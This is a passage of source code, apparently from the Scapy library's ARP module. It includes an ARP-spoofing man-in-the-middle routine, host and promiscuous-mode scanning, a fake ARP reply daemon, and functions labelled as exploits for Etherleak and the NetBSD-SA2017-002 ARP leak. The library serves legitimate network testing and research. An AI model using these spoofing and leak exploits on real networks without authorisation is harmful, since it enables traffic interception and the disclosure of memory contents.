956        raise OSError(f"Could not resolve {ip2}")
957    print(f"MITM on {iface}: %s <--> {target_mac} <--> %s" % (
958        [x[1] for x in tup1],
959        [x[1] for x in tup2],
960    ))
961    # We loop who-has requests
962    srploop(
963        list(itertools.chain(
964            (x
965             for ipa, maca in tup1
966             for ipb, _ in tup2
967             if ipb != ipa
968             for x in
969             Ether(dst=maca, src=target_mac) /
970             ARP(op="who-has", psrc=ipb, pdst=ipa,
971                 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
972             ),
973            (x
974             for ipb, macb in tup2
975             for ipa, _ in tup1
976             if ipb != ipa
977             for x in
978             Ether(dst=macb, src=target_mac) /
979             ARP(op="who-has", psrc=ipa, pdst=ipb,
980                 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
981             ),
982        )),
983        filter="arp and arp[7] = 2",
984        inter=inter,
985        iface=iface,
986        timeout=0.5,
987        verbose=1,
988        store=0,
989    )
990    print("Restoring...")
991    sendp(
992        list(itertools.chain(
993            (x
994             for ipa, maca in tup1
995             for ipb, macb in tup2
996             if ipb != ipa
997             for x in
998             Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) /
999             ARP(op="who-has", psrc=ipb, pdst=ipa,
1000                 hwsrc=macb, hwdst="00:00:00:00:00:00")
1001             ),
1002            (x
1003             for ipb, macb in tup2
1004             for ipa, maca in tup1
1005             if ipb != ipa
1006             for x in
1007             Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) /
1008             ARP(op="who-has", psrc=ipa, pdst=ipb,
1009                 hwsrc=maca, hwdst="00:00:00:00:00:00")
1010             ),
1011        )),
1012        iface=iface
1013    )
1014
1015
1016class ARPingResult(SndRcvList):
1017    def __init__(self,
1018                 res=None,  # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]]  # noqa: E501
1019                 name="ARPing",  # type: str
1020                 stats=None  # type: Optional[List[Type[Packet]]]
1021                 ):
1022        SndRcvList.__init__(self, res, name, stats)
1023
1024    def show(self, *args, **kwargs):
1025        # type: (*Any, **Any) -> None
1026        """
1027        Print the list of discovered MAC addresses.
1028        """
1029        data = list()  # type: List[Tuple[str | List[str], ...]]
1030
1031        for s, r in self.res:
1032            manuf = conf.manufdb._get_short_manuf(r.src)
1033            manuf = "unknown" if manuf == r.src else manuf
1034            data.append((r[Ether].src, manuf, r[ARP].psrc))
1035
1036        print(
1037            pretty_list(
1038                data,
1039                [("src", "manuf", "psrc")],
1040                sortBy=2,
1041            )
1042        )
1043
1044
1045@conf.commands.register
1046def arping(net: str,
1047           timeout: int = 2,
1048           cache: int = 0,
1049           verbose: Optional[int] = None,
1050           threaded: bool = True,
1051           **kargs: Any,
1052           ) -> Tuple[ARPingResult, PacketList]:
1053    """
1054    Send ARP who-has requests to determine which hosts are up::
1055
1056        arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None
1057
1058    Set cache=True if you want arping to modify internal ARP-Cache
1059    """
1060    if verbose is None:
1061        verbose = conf.verb
1062
1063    hwaddr = None
1064    if "iface" in kargs:
1065        hwaddr = get_if_hwaddr(kargs["iface"])
1066    if isinstance(net, list):
1067        hint = net[0]
1068    else:
1069        hint = str(net)
1070    psrc = conf.route.route(hint, verbose=False)[1]
1071    if psrc == "0.0.0.0":
1072        if "iface" in kargs:
1073            psrc = get_if_addr(kargs["iface"])
1074        else:
1075            warning(
1076                "No route found for IPv4 destination %s. "
1077                "Using conf.iface. Please provide an 'iface' !" % hint)
1078            psrc = get_if_addr(conf.iface)
1079            hwaddr = get_if_hwaddr(conf.iface)
1080            kargs["iface"] = conf.iface
1081
1082    ans, unans = srp(
1083        Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP(
1084            pdst=net,
1085            psrc=psrc,
1086            hwsrc=hwaddr
1087        ),
1088        verbose=verbose,
1089        filter="arp and arp[7] = 2",
1090        timeout=timeout,
1091        threaded=threaded,
1092        iface_hint=hint,
1093        **kargs,
1094    )
1095    ans = ARPingResult(ans.res)
1096
1097    if cache and ans is not None:
1098        for pair in ans:
1099            _arp_cache[pair[1].psrc] = pair[1].hwsrc
1100    if ans is not None and verbose:
1101        ans.show()
1102    return ans, unans
1103
1104
1105@conf.commands.register
1106def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
1107    # type: (str, str, **Any) -> bool
1108    """Try to guess if target is in Promisc mode. The target is provided by its ip."""  # noqa: E501
1109
1110    responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs)  # noqa: E501
1111
1112    return responses is not None
1113
1114
1115@conf.commands.register
1116def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
1117    # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
1118    """Send ARP who-has requests to determine which hosts are in promiscuous mode
1119    promiscping(net, iface=conf.iface)"""
1120    ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net),
1121                     filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs)  # noqa: E501
1122    ans = ARPingResult(ans.res, name="PROMISCPing")
1123
1124    ans.show()
1125    return ans, unans
1126
1127
1128class ARP_am(AnsweringMachine[Packet]):
1129    """Fake ARP Relay Daemon (farpd)
1130
1131    example:
1132    To respond to an ARP request for 192.168.100 replying on the
1133    ingress interface::
1134
1135      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')
1136
1137    To respond on a different interface add the interface parameter::
1138
1139      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')
1140
1141    To respond on ANY arp request on an interface with mac address ARP_addr::
1142
1143      farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')
1144
1145    To respond on ANY arp request with my mac addr on the given interface::
1146
1147      farpd(iface='eth1')
1148
1149    Optional Args::
1150
1151     inter=<n>   Interval in seconds between ARP replies being sent
1152
1153    """
1154
1155    function_name = "farpd"
1156    filter = "arp"
1157    send_function = staticmethod(sendp)
1158
1159    def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
1160        # type: (Optional[str], Optional[str], Optional[str]) -> None
1161        if isinstance(IP_addr, str):
1162            self.IP_addr = Net(IP_addr)  # type: Optional[Net]
1163        else:
1164            self.IP_addr = IP_addr
1165        if isinstance(from_ip, str):
1166            self.from_ip = Net(from_ip)  # type: Optional[Net]
1167        else:
1168            self.from_ip = from_ip
1169        self.ARP_addr = ARP_addr
1170
1171    def is_request(self, req):
1172        # type: (Packet) -> bool
1173        if not req.haslayer(ARP):
1174            return False
1175        arp = req[ARP]
1176        return (
1177            arp.op == 1 and
1178            (self.IP_addr is None or arp.pdst in self.IP_addr) and
1179            (self.from_ip is None or arp.psrc in self.from_ip)
1180        )
1181
1182    def make_reply(self, req):
1183        # type: (Packet) -> Packet
1184        ether = req[Ether]
1185        arp = req[ARP]
1186
1187        if 'iface' in self.optsend:
1188            iff = cast(Union[NetworkInterface, str], self.optsend.get('iface'))
1189        else:
1190            iff, a, gw = conf.route.route(arp.psrc)
1191        self.iff = iff
1192        if self.ARP_addr is None:
1193            try:
1194                ARP_addr = get_if_hwaddr(iff)
1195            except Exception:
1196                ARP_addr = "00:00:00:00:00:00"
1197        else:
1198            ARP_addr = self.ARP_addr
1199        resp = Ether(dst=ether.src,
1200                     src=ARP_addr) / ARP(op="is-at",
1201                                         hwsrc=ARP_addr,
1202                                         psrc=arp.pdst,
1203                                         hwdst=arp.hwsrc,
1204                                         pdst=arp.psrc)
1205        return resp
1206
1207    def send_reply(self, reply, send_function=None):
1208        # type: (Packet, Any) -> None
1209        if 'iface' in self.optsend:
1210            self.send_function(reply, **self.optsend)
1211        else:
1212            self.send_function(reply, iface=self.iff, **self.optsend)
1213
1214    def print_reply(self, req, reply):
1215        # type: (Packet, Packet) -> None
1216        print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff))
1217
1218
1219@conf.commands.register
1220def etherleak(target, **kargs):
1221    # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
1222    """Exploit Etherleak flaw"""
1223    return srp(Ether() / ARP(pdst=target),
1224               prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load),  # noqa: E501
1225               filter="arp", **kargs)
1226
1227
1228@conf.commands.register
1229def arpleak(target, plen=255, hwlen=255, **kargs):
1230    # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
1231    """Exploit ARP leak flaws, like NetBSD-SA2017-002.
1232
1233https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
1234
1235    """
1236    # We want explicit packets
1237    pkts_iface = {}  # type: Dict[str, List[Packet]]
1238    for pkt in ARP(pdst=target):
1239        # We have to do some of Scapy's work since we mess with
1240        # important values
1241        iface = conf.route.route(pkt.pdst)[0]
1242        psrc = get_if_addr(iface)
1243        hwsrc = get_if_hwaddr(iface)
1244        pkt.plen = plen
1245        pkt.hwlen = hwlen
1246        if plen == 4:
1247            pkt.psrc = psrc
1248        else:
1249            pkt.psrc = inet_aton(psrc)[:plen]
1250            pkt.pdst = inet_aton(pkt.pdst)[:plen]
1251        if hwlen == 6:
1252            pkt.hwsrc = hwsrc
1253        else:
1254            pkt.hwsrc = mac2str(hwsrc)[:hwlen]
1255        pkts_iface.setdefault(iface, []).append(
1256            Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt
1257        )
1258    ans, unans = SndRcvList(), PacketList(name="Unanswered")
1259    for iface, pkts in pkts_iface.items():
1260        ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
1261        ans += ans_new
1262        unans += unans_new
1263        ans.listname = "Results"
1264        unans.listname = "Unanswered"
1265    for _, rcv in ans:
1266        if ARP not in rcv:
1267            continue
1268        rcv = rcv[ARP]
1269        psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc)
1270        if plen > 4 and len(psrc) > 4:
1271            print("psrc")
1272            hexdump(psrc[4:])
1273            print()
1274        hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc)
1275        if hwlen > 6 and len(hwsrc) > 6:
1276            print("hwsrc")
1277            hexdump(hwsrc[6:])
1278            print()
1279    return ans, unans
1280